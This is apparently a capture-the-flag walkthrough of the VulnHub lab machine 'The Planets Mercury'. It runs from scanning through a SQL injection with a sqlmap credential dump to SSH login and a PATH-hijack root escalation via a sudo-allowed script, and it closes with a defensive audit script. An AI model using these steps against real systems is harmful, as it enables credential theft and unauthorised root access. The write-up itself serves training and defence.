The Planets Mercury Walkthrough

In this article, we solve another VulnHub CTF, The Planets Mercury. It is another boot-to-root challenge, and the VM was made by SirFlash. You can download the machine here.

Network Scanning

Let's discover the target IP address using the netdiscover command.

sudo netdiscover

We discover an IP address; in my case the target machine's IP address is 192.168.43.110. Our next step is to scan all ports and running services with Nmap.

sudo nmap -A -p- 192.168.43.110

Enumeration

Two ports are open: 22 (SSH) and 8080, running http-proxy. We navigate to the target IP address in the browser and find nothing useful there.

Next we try some common URLs. We get a page-not-found error, and in it we find an interesting URL: /mercuryfacts/

http://192.168.43.110:8080/admin

We open the /mercuryfacts page and find nothing useful there, so we try some SQL injection and get a SQL syntax error.

http://192.168.43.110:8080/mercuryfacts/
http://192.168.43.110:8080/mercuryfacts/1'

We move to the terminal and use sqlmap to enumerate the database name, tables, and columns, then dump all usernames and passwords with the following sqlmap command.

sqlmap --url http://192.168.43.110:8080/mercuryfacts -D mercury -T users -C username,password --dump --batch

Since we found many credentials in the SQL database, we try them against the SSH server. On the third try, we successfully log in as the webmaster user.

ssh [email protected]

Now that we have shell access on the target machine, let's enumerate the directories and files. We find our first flag in the webmaster home directory. We also find a notes.txt file, which we open with the cat command.

ls
cat user_flag.txt
cd mecury_proj/
ls
cat notes.txt

Here we see a base64-encoded string. Decoding it gives us the password of another user, linuxmaster.

su linuxmaster
id

Privilege Escalation

We run sudo -l to check the sudo privileges of the linuxmaster user and find that linuxmaster has sudo rights for the custom bash script check_syslog.sh. To escalate to root, run the following commands.

sudo -l
cat /usr/bin/check_syslog.sh
ln -s /bin/vi tail
export PATH=.:$PATH
sudo --preserve-env=PATH /usr/bin/check_syslog.sh

We now have a root shell on the target machine. Let's move to the /root directory and read the root flag, which completes the challenge.

ls
cat root_flag.txt
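
The escalation above works because check_syslog.sh runs as root while its commands are still resolved through a PATH the caller supplies. The following shell functions are an added example, not code from the original post or the VM author: they audit a script for lookups that a caller-controlled PATH would redirect. The stand-in script body, the temporary directory layout and all function names are constructed for illustration, since the post does not show the contents of check_syslog.sh.

```shell
#!/bin/sh
# Added example (not from the original post): report commands in a root-run
# script whose lookup changes when the caller controls PATH.

# Print the first executable named $1 in the colon-separated directory list $2.
resolve_in_path() {
    _cmd=$1; _old_ifs=$IFS; IFS=:
    for _dir in $2; do
        [ -n "$_dir" ] || _dir=.          # empty PATH entry means current dir
        if [ -f "$_dir/$_cmd" ] && [ -x "$_dir/$_cmd" ]; then
            IFS=$_old_ifs; printf '%s\n' "$_dir/$_cmd"; return 0
        fi
    done
    IFS=$_old_ifs; return 1
}

# Heuristic: first word of each non-blank, non-comment line that has no '/'.
bare_commands() {
    awk 'NF && $1 !~ /^#/ && $1 !~ /\// { print $1 }' "$1" | sort -u
}

# audit_script SCRIPT TRUSTED_PATH CALLER_PATH
# Prints "cmd: trusted -> actual" for each redirected lookup; returns 1 if any.
audit_script() {
    _rc=0
    for _c in $(bare_commands "$1"); do
        _good=$(resolve_in_path "$_c" "$2") || continue  # builtin or keyword
        _seen=$(resolve_in_path "$_c" "$3") || continue
        if [ "$_good" != "$_seen" ]; then
            printf '%s: %s -> %s\n' "$_c" "$_good" "$_seen"; _rc=1
        fi
    done
    return $_rc
}

# Constructed demo: stand-in script, a "system" dir and a caller-writable dir.
demo() {
    _t=$(mktemp -d) || return 2
    mkdir "$_t/sys" "$_t/cwd"
    printf '#!/bin/sh\nexit 0\n' > "$_t/sys/tail"
    cp "$_t/sys/tail" "$_t/cwd/tail"; chmod +x "$_t/sys/tail" "$_t/cwd/tail"
    printf '#!/bin/bash\ntail -n 10 /var/log/syslog\n' > "$_t/check.sh"
    _r=0; audit_script "$_t/check.sh" "$_t/sys" "$_t/cwd:$_t/sys" || _r=$?
    rm -rf "$_t"; return $_r
}
```

Calling demo prints one finding for tail and returns 1. The corresponding fix is to call binaries by absolute path inside the script and to keep the sudoers entry from preserving the caller's PATH, so that sudo's secure_path applies.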

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.